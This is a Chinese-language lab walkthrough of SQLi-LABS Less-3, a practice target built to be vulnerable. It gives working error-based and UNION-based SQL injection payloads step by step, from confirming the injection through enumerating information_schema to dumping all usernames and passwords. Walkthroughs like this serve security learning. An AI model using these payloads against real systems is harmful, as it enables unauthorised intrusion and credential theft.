初学SQLi-LABS过关分享Less-3

Less-3：GET - Error based - single quotes with twist - string
基于单引号和括号的错误

一、判断网页是否为动态网页

Please input the ID as parameter with numeric value输入ID作为带数值的参数
尝试在url地址中输入?id=1传参，成功获取到了两条数据，输入?id=2时返回不同的数据

证明该网页是一个动态网页

二、判断是否存在sql注入漏洞

尝试在?id=1后面添加一个单引号'，提示语法错误，这里我们可以看见

'   '1'   ') LIMIT 0,1  '，这里是用('$id')的方式闭合的
尝试输入?id=1') and 1=1-- -，正常显示数据，未报错

输入?id=1') and 1=2-- -未显示内容，没有输出，没有执行sql查询，可以得出结论，此处存在sql注入漏洞

三、判断原查询语句的查询参数个数和显示的位

使用order by来进行判断
输入?id=1') order by 5-- -，提示报错，减小数值

 输入?id=1') order by 4-- -，提示报错，减小数值

输入?id=1') order by 3-- -，未报错，则原查询语句查询了三个参数

接下来判断显示的位数，先使前面报错，id改为-1，然后使用联合查询union
输入?id=-1') union select 1,2,3-- -，可以看见显示的位是2号位和3号位

四、获取MySQL数据库的版本和当前库名 

使用version()函数获取版本，database()函数获取当前库名，因为一号位不显示，所以在二号位和三号位使用函数
输入?id=-1') union select 1,version(),database()-- -，成功获取到数据库版本5.7.26，和当前的库名security

MySQL数据库版本在5.0以上，说明可以利用information_schema这个库，获取到当前库所有的表，和表中所有的列

五、爆库

输入?id=-1') union select 1,2,TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=database() -- -

这里只显示了一个表，可以通过group_concat()函数将查询到的多行数据显示在一行中
输入?id=-1') union select 1,2,group_concat(TABLE_NAME) from information_schema.TABLES where TABLE_SCHEMA=database() -- -
通过group_concat()显示出了四个表emails，referers，uagents，users

程序员可能会对显示的结果做位数限制，所以也可以用limit分页来查询，比如
输入?id=-1') union select 1,2,TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=database() limit 0,1-- -

输入?id=-1') union select 1,2,TABLE_NAME from information_schema.TABLES where TABLE_SCHEMA=database() limit 1,1-- -

 六、爆表

在emails，referers，uagents，users这四个表中，users最有可能存放用户的重要信息，爆出users表中的数据
输入?id=-1') union select 1,2,group_concat(COLUMN_NAME) from information_schema.COLUMNS where COLUMNS.TABLE_SCHEMA='security' and COLUMNS.TABLE_NAME='users' -- -
可以看到里面的列，id，username和password

获取username和对应的password
输入?id=-1') union select 1,group_concat(username),group_concat(password) from users-- -

成功获取所有用户名和密码